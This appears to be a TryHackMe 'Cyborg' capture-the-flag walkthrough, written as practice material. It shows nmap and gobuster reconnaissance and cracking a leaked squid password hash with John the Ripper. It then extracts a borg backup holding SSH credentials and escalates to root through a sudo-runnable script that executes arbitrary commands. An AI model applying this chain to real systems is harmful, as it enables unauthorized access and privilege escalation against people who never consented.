TryHackMe - Cyborg
Let's do Cyborg on TryHackMe
Open Ports
$ nmap -sV -sC --open -Pn $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 01:57 EDT
Nmap scan report for 10.10.238.68
Host is up (0.18s latency).
Not shown: 704 closed tcp ports (conn-refused), 294 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: |
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA) |
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA) |
| _ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519) |
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web
Discover any easy information on the web server with gobuster.
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://$IP
/admin
Poking around we see some chatter which gives away what else to look for:
Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier.
I decided to give up like i always do ahahaha sorry about that.
I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process.
Might pass it over to the IT guys but in the meantime all the config files are laying about.
And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol.
other than that im pretty sure my backup "music_archive" is safe just to confirm.
Download the music archive, archive.tar
/etc/squid/{passwd, squid.conf}
Download the passwd file, crack it with john the ripper
$ john -wordlist:/usr/share/wordlists/rockyou.txt ./passwd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
******** (music_archive)
1g 0:00:00:00 DONE (2022-10-09 02:04) 2.000g/s 77952p/s 77952c/s 77952C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Use the cracked password and borg to extract the downloaded archive
$ cat Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
****:**********
Initial Access - SSH
Now we can SSH to the server as alex with the found password.
alex@ubuntu:~$ cat user.txt
flag{*********************************}
Privilege Escalation
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
The backup script can be executed via sudo, and looking at it, we see it has the option to run some command:
while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done
This means we can specify an additional argument, which will be executed towards the end of the script, and since we're going to execute the script with sudo, it will execute that command as root.
$ sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"
flag{***********************************}